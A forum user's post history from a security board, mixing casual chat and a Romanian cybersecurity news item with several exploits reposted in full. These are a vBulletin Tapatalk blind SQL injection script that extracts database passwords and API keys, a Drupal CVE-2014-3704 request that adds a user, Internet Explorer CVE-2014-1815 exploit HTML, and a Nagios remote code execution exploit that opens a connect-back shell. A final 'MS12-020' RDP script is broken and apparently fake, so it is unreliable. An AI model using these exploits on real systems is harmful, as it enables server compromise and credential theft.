Everything posted by Nytro

  1. Hacking Oracle from the Web

This paper discusses the exploitation techniques available for exploiting SQL injection from web applications against the Oracle database. Most of the techniques available on the Internet assume that the attacker has interactive access to the Oracle database, i.e. he can connect to the database via a SQL client. While some of these techniques can be applied directly when exploiting SQL injection in web applications, this is not always true. Unlike MS-SQL, Oracle neither supports nested queries, nor has any direct functionality like xp_cmdshell to allow execution of operating system commands. Extraction of sensitive data from a back-end database by exploiting SQL injection in Oracle web applications is well known. Performing privilege escalation and executing operating system commands from web applications is not widely known, and is the subject of this paper.

Download: http://7safe.com/assets/pdfs/Hacking_Oracle_From_Web_2.pdf
  2. If you had bothered to look, you would have found out that he had them before going into politics. And if you had seen the photos you would have realized they are not "villas". The problem I see with him is this: he too hands out "bags with a bit of everything" to old ladies in the countryside so they vote for him. So, screw him.
  3. Vote.
  4. [h=1]A new profession in Romania: cyber security specialist[/h]
by Liviu Iancu - Mediafax

A new profession will appear in Romania, that of specialist in the field of cyber security. The job description is currently being drafted, and the position will then be added to the occupational code and have salary standards set for it, Sorin Encuțescu, state counsellor to the prime minister, said on Wednesday.

"Our concern at this moment is for institutions to have specialized people who can work as competently as possible in this field. That is why, alongside the development of the system of institutional responsibilities, work is under way right now on the job descriptions for the positions that are to be created, so that we can create in Romania, and put into the occupational code, the position of specialist in the field of cyber security. This new profession must be recognized and must be introduced into the Romanian occupational code, from where we can also set salary standards," Encuțescu said at a seminar organized by the UTI group.

He pointed out that a new component has been introduced into the national security industry strategy: developing and supporting the public and state economic operators that work in the field of cyber security.

"In practice, at this moment, the strategy contains a component concerning the encouragement of small and medium enterprises and start-ups in the field of cyber security. We support and encourage the creation of such companies," Encuțescu added.

The counsellor mentioned that the state intends to grant tax incentives to companies that invest in cyber security.

Teodor Cimpoeșu, director at certSIGN, the cyber security company within UTI, said that in Romania cyber attacks are carried out not only by Romanians but also by foreigners.

"It is a threat, on the one hand, to the individual user who is on the internet, from the simple fact that their login data and social network accounts are stolen, up to having their bank details or even the money in their account stolen. For companies it is more serious, because the IT structures with which they carry out their activity can be affected," Cimpoeșu added.

Source: O nouă meserie în România: specialist în securitate cibernetică - Mediafax
  5. [h=1]vBulletin Tapatalk - Blind SQL Injection[/h]

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, urllib
import xmlrpclib,re, urllib2,string,itertools,time
from distutils.version import LooseVersion

class Exploit(object):
    def __init__(self, target, debug=0 ):
        self.stopwatch_start=time.time()
        self.target = target
        self.path = target
        self.debug=debug
        if not self.target.endswith("mobiquo.php"):
            self.path = self.detect_tapatalk()
            if not self.path:
                raise Exception("Could not detect tapatalk or version not supported!")
        self.rpc_connect()
        self.attack_func = self.attack_2

    def detect_tapatalk(self):
        # request page, check for tapatalk banner
        handlers = [
            urllib2.HTTPHandler(debuglevel=self.debug),
            urllib2.HTTPSHandler(debuglevel=self.debug),
        ]
        ua = urllib2.build_opener(*handlers)
        ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
        data = ua.open(self.target).read()
        if self.debug: print data
        if not "tapatalkDetect()" in data:
            print "[xx] could not detect tapatalk. bye..."
            return None
        # extract tapatalk version
        print "[ i] Taptalk detected ... ",
        path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL))
        path+="mobiquo.php"
        print "'%s' ... "%path,
        data = urllib.urlopen(path).read()
        version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data))
        if LooseVersion(version) <= LooseVersion("5.2.1"):
            print "v.%s - OK"%version
            return path
        print "v.%s - not vulnerable"%version
        return None

    def rpc_connect(self):
        self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug)

    def attack_1(self, sqli, sleep=2):
        '''
        SELECT subscribethreadid FROM subscribethread AS subscribethread
        LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
        WHERE subscribethreadid = <INJECTION> AND subscribethreadid.userid = 0";
        <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
        '''
        query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
        query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1"    # fix query for "AND subscribeforum.userid=0"
        if self.debug: print """ SELECT subscribethreadid FROM subscribethread AS subscribethread LEFT JOIN user AS user ON (user.userid=subscribethread.userid) WHERE subscribethreadid = %s AND subscribethread.userid = 0"""%query
        return self.rpc.unsubscribe_topic("s_%s"%query)    #no escape, invalid_char="_"

    def attack_2(self, sqli, sleep=2):
        '''
        SELECT subscribeforumid FROM subscribeforum AS subscribeforum
        LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
        WHERE subscribeforumid = <INJECTION> AND subscribeforum.userid = 0";
        <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
        '''
        query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
        query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1"    # fix query for "AND subscribeforum.userid=0"
        if self.debug: print """ SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = %s AND subscribeforum.userid = 0"""%query
        return self.rpc.unsubscribe_forum("s_%s"%query)    #no escape, invalid_char="_"

    def attack_blind(self,sqli,sleep=2):
        return self.attack_func(sqli,sleep=sleep)
        #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli)

    def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True):
        '''
        provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS>
        '''
        hit = False
        # PHASE 1 - guess entry length
        print "[  ] trying to guess length ..."
        for guess_length in xrange(maxlength+1):
            q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length)
            self.stopwatch()
            self.attack_blind(q, sleep)
            duration = self.stopwatch()
            print ".",
            if duration >= sleep-sleep/8:
                # HIT! - got length! => guess_length
                hit = True
                print ""
                break
        if not hit:
            print "[ !!] unable to guess password length, check query!"
            return None
        print "[ *] LENGTH = %s"%guess_length

        # PHASE 2 - guess password up to length
        print "[  ] trying to guess value ..."
        hits = 0
        result = ""
        for pos in xrange(guess_length):                    # for each char pos in up to guessed length
            for attempt in self.bruteforce(charset, 1):     # probe all chars in charset
                #attempt = re.escape(attempt)
                if attempt == "%%": attempt= "\%"
                #LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary
                q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt))
                self.stopwatch()
                self.attack_blind(q, sleep)
                duration = self.stopwatch()
                #print result,attempt,"  ",duration
                print ".",
                if duration >= sleep-sleep/8:
                    if case:
                        # case insensitive hit - recheck case: this is drastically reducing queries needed.
                        q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower()))
                        self.stopwatch()
                        self.attack_blind(q, sleep)
                        duration = self.stopwatch()
                        if duration >= sleep-sleep/8:
                            attempt = attempt.lower()
                        else:
                            attempt = attempt.upper()
                        # case sensitive - end
                    # HIT! - got length! => guess_length
                    hits += 1
                    print ""
                    print "[ +] HIT! - %s[%s].."%(result,attempt)
                    result += attempt
                    break
        if not hits==guess_length:
            print "[ !!] unable to guess password length, check query!"
            return None
        print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result))
        return result

    def bruteforce(self, charset, maxlength):
        return (''.join(candidate)
            for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
            for i in range(1, maxlength + 1)))

    def stopwatch(self):
        stop = time.time()
        diff = stop - self.stopwatch_start
        self.stopwatch_start=stop
        return diff

if __name__=="__main__":
    #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
    DEBUG = False
    TARGET = "http://TARGET/vbb4/forum.php"

    x = Exploit(TARGET,debug=DEBUG)
    print "[  ] TAPATALK for vBulletin 4.x - SQLi"
    print "[--] Target: %s"%TARGET
    if DEBUG: print "[--] DEBUG-Mode!"
    print "[ +] Attack - sqli"
    query = u"-1 UNION SELECT 1%s"%unichr(0)
    if DEBUG: print u""" SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = %s AND subscribeforum.userid = 0"""%query

    print "[ *] guess mysql user/pass"
    print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>", column="password", charset="*"+string.hexdigits, maxlength=45)     # usually 40 chars + 1
    print "[ *] guess apikey"
    print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>", column='value', charset=string.ascii_letters+string.digits, maxlength=14, )
    print "-- done --"
```

Source: vBulletin Tapatalk - Blind SQL Injection
  6. I'll join in too if 2 more people volunteer.
  7. FindWindow, FindWindowEx, GetWindowRect. There are many Windows functions you can use: Window Functions (Windows). I don't know what AutoIT offers you, though.
  8. [h=1]Drupal CVE-2014-3704 insert new user[/h]

```http
POST /drupal/?q=node&destination=node HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 192.168.88.88
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko
Content-Type: application/x-www-form-urlencoded
Content-Length: 258

name[0%20;insert+into+users+%28uid%2cname%2cpass%2cstatus%29+values+%28123456%2c'greenbull'%2c'$S$DkH0O9Lpt5i1oUi9yYeouLW0ZCAHo/u75ReE1zjCPaPbZoVZQX/m'%2c1%29;;#%20%20]=nTzlWXKY&name[0]=ptSHbjbW&pass=o81NgWxc&form_build_id=&form_id=user_login_block&op=Log+in
```
  9. You can use the "Free stuff" category if you want to offer something. Offer it to whomever you want, on whatever criteria you want. Good luck!
  10. Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4182969-security-patch-release-for-vbulletin-connect-5-0-0-5-1-4
  11. Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4183258-security-exploit-fixed-in-vbulletin-4-2-2-and-4-2-3
  12. I want to see 20-30 things you've donated before you give your opinion.
  13. OWASP is on Friday. See you there.
  14. There are a few useful things, but nothing special. Other interesting forums are: opensc, trojanforge, rohitab, tuts4you, kernelmode and many others. And @giv's reversing.ro.
  15. CCleaner Pro Patching Tut by Kjacky
Home Page: http://www.piriform.com/
Tutorial: CCP
Source: EXETOOLS FORUM
  16. CVE-2014-1815 Html code - Internet Explorer 6-11

CVE-2014-1815 Html code:

```html
<!doctype html>
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function stc()
{
    var Then = new Date();
    Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
    document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
function cid()
{
    var swf = 0;
    try {
        swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
    }
    if (!swf)
        return 0;
    var cookieString = new String(document.cookie);
    if(cookieString.indexOf("d93kaj3Nja3") == -1)
    {stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=unescape("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.createElement("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
function b2()
{
    try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){}
    try{xdd.outerText='';}catch(exception){}
    CollectGarbage();
    for(i=0;i<3333;i++) ll[i].className=tpx;
}
function a1(){
    if (!cid())
        return;
    document.body.contentEditable="true";
    try{xdd.applyElement(document.createElement("frameset"));}catch(exception){}
    try{document.selection.createRange().select();}catch(exception){}
}
</script>
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd ></marquee>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
<param name="movie" value="storm.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="true" />
</object>
</body>
<body>
<form name=loading>
  <p align=center><font color="#0066ff" size="2">Loading....,Please Wait</font><font color="#0066ff" size="2" face="verdana">...</font>
    <input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">

    <input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
    <script>
    var bar=0
    var line="||"
    var amount="||"
    count()
    function count(){
        bar=bar+2
        amount =amount + line
        document.loading.chart.value=amount
        document.loading.percent.value=bar+"%"
        if (bar<99)
        {setTimeout("count()",500);}
        else
        {window.location = "http://www.google.com.hk";}
    }</script>
  </p>
</form>
<p align="center">Wart,<a style="text-decoration: none" href="http://www.google.com.hk"><font color="#FF0000">kick me</font></a>.</p>
</body>
</html>
```

Source: CVE-2014-1815 Html code - Pastebin.com
  17. CVE-2012-6096 - Nagios history.cgi Remote Command Execution

```python
#!/usr/bin/python
#
# CVE-2012-6096 - Nagios history.cgi Remote Command Execution
# ===========================================================
# Another year, another reincarnation of classic and trivial
# bugs to exploit. This time we attack Nagios.. or more
# specifically, one of its CGI scripts. [1]
#
# The Nagios code is an amazing monster. It reminds me a
# lot of some of my early experiments in C, back when I
# still had no clue what I was doing. (Ok, fair enough,
# I still don't, heheh.)
#
# Ok, I'll come clean. This exploit doesn't exactly
# defeat FORTIFY. This approach is likely to work just FINE
# on other crippled distro's though, think of stuff like
# ArchLinux, Slackware, and all those Gentoo kids twiddling
# their CFLAGS. [2] (Oh and hey, BSD and stuff!)
#
# I do some very stupid shit(tm) here that might make an
# exploit coder or two cringe. My sincere apologies for that.
#
# Cold beer goes out to my friends who are still practicing
# this dying but interesting type of art:
#
# * brainsmoke * masc * iZsh * skier_ * steve *
#
# -- blasty <blasty@fail0verflow.com> / 2013-01-08
#
# References:
# [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109
# [2] http://www.funroll-loops.info/
#
# P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n!
# Next time you rebrand an exploit at least show some diligence and
# add some additional targets or improvements, so we can all profit!
#
# P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy!
#

import os, sys, socket, struct, urllib, threading, SocketServer, time
from base64 import b64encode

SocketServer.TCPServer.allow_reuse_address = True

targets = [
    {
        "name"       : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)",
        "smash_len"  : 0xc37,
        "unescape"   : 0x0804b620,
        "popret"     : 0x08048fe4,
        "hostbuf"    : 0x080727a0,
        "system_plt" : 0x08048c7c
    }
]

def u32h(v):
    return struct.pack("<L", v).encode('hex')

def u32(v, hex = False):
    return struct.pack("<L", v)

# Tiny ELF stub based on:
# http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
def make_elf(sc):
    elf_head = \
        "7f454c46010101000000000000000000" + \
        "02000300010000005480040834000000" + \
        "00000000000000003400200001000000" + \
        "00000000010000000000000000800408" + \
        "00800408" + u32h(0x54+len(sc))*2 + \
        "0500000000100000"

    return elf_head.decode("hex") + sc

# interactive connectback listener
class connectback_shell(SocketServer.BaseRequestHandler):
    def handle(self):
        print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0]
        print "[**] This shell is powered by insane amounts of illegal substances"
        s = self.request

        import termios, tty, select, os
        old_settings = termios.tcgetattr(0)
        try:
            tty.setcbreak(0)
            c = True

            os.write(s.fileno(), "id\nuname -a\n")

            while c:
                for i in select.select([0, s.fileno()], [], [], 0)[0]:
                    c = os.read(i, 1024)
                    if c:
                        if i == 0:
                            os.write(1, c)

                        os.write(s.fileno() if i == 0 else 1, c)
        except KeyboardInterrupt:
            pass
        finally:
            termios.tcsetattr(0, termios.TCSADRAIN, old_settings)

        return

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    pass

if len(sys.argv) != 5:
    print "\n  >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>"
    print "  >> \"Jetzt geht's Nagi-los!\"\n"
    print "  usage: %s <base_uri> <myip> <myport> <target>\n" % (sys.argv[0])
    print "  targets:"
    i = 0
    for target in targets:
        print "    %02d) %s" % (i, target['name'])
        i = i+1
    print ""
    sys.exit(-1)

target_no = int(sys.argv[4])
if target_no < 0 or target_no > len(targets):
    print "Invalid target specified"
    sys.exit(-1)

target = targets[ int(sys.argv[4]) ]

# comment this shit if you want to setup your own listener
server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()

# shellcode to be executed
# vanilla x86/linux connectback written by a dutch gentleman
# close to a decade ago.
cback = \
    "31c031db31c951b10651b10151b10251" + \
    "89e1b301b066cd8089c231c031c95151" + \
    "68badc0ded6668b0efb102665189e7b3" + \
    "1053575289e1b303b066cd8031c939c1" + \
    "740631c0b001cd8031c0b03f89d3cd80" + \
    "31c0b03f89d3b101cd8031c0b03f89d3" + \
    "b102cd8031c031d250686e2f7368682f" + \
    "2f626989e3505389e1b00bcd8031c0b0" + \
    "01cd80"

cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex"))
cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex"))

# Eww.. so there's some characters that dont survive the trip..
# yes, even with the unescape() call in our return-chain..
# initially I was going to use some /dev/tcp based connectback..
# but /dev/tcp isn't available/accesible everywhere, so instead
# we drop an ELF into /tmp and execute that. The '>' characters
# also doesn't survive the trip so we work around this by using
# the tee(1) utility.
# If your target has a /tmp that is mounted with noexec flag,
# is severely firewalled or guarded by trained (watch)dogs..
# you might want to reconsider this approach!
cmd = \
    "rm -rf /tmp/x;" + \
    "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \
    "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;"

# Spaces (0x20) are also a problem, they always ends up as '+'
# so apply some olde trick and rely on $IFS for argv separation
cmd = cmd.replace(" ", "${IFS}")

# Basic return-2-whatever/ROP chain.
# We return into cgi_input_unescape() to get rid of
# URL escaping in a static buffer we control, and then
# we return into system@plt for the moneyshot.
#
# Ergo sum:
# There's no memoryleak or whatever needed to leak libc
# base and bypass ASLR.. This entire Nagios PoS is stringed
# together by system() calls, so pretty much every single one
# of their little silly binaries comes with a PLT entry for
# system(), huzzah!
rop = [
    u32(target['unescape']),
    u32(target['popret']),
    u32(target['hostbuf']),
    u32(target['system_plt']),
    u32(0xdeafbabe),
    u32(target['hostbuf'])
]

# Yes.. urllib, so it supports HTTPS, basic-auth and whatnot
# out of the box. Building HTTP requests from scratch is so 90ies..
params = urllib.urlencode({
    'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop)
})

print "[>>] CL1Q .."
f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params)
print "[>>] CL4Q .."
f.read()

# TRIAL PERIOD ACTIVE, LOL!
time.sleep(0x666)
server.shutdown()
```

Source: [Python] CVE-2012-6096 exploit - Pastebin.com
  18. CVE-2012-0002 - Remote Desktop Protocol (RDP)

```python
#!/usr/bin/env python
#############################################################################
#   MS12-020 Exploit by Sabu
#   sabu@fbi.gov
#   Uses FreeRDP
#############################################################################

import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import rdpNego

#bind shellcode TCP port 4444
shellcode  = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'

#Payload
payload = '\x41\x00\x5c\x00'
payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68';

class SRVSVC_Exploit(Thread):
    def __init__(self, target, port=3389):
        super(SRVSVC_Exploit, self).__init__()
        self.__port = port
        self.target = target

    def __DCEPacket(self):
        print '[-]Connecting'
        self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
        self.__trans.connect()
        print '[-]connected' % self.target

        # Making teh packet
        self.__stub='\x01\x00\x00\x00'
        self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub+=shellcode
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub+=payload
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'

if __name__ == '__main__':
    target = sys.argv[1]
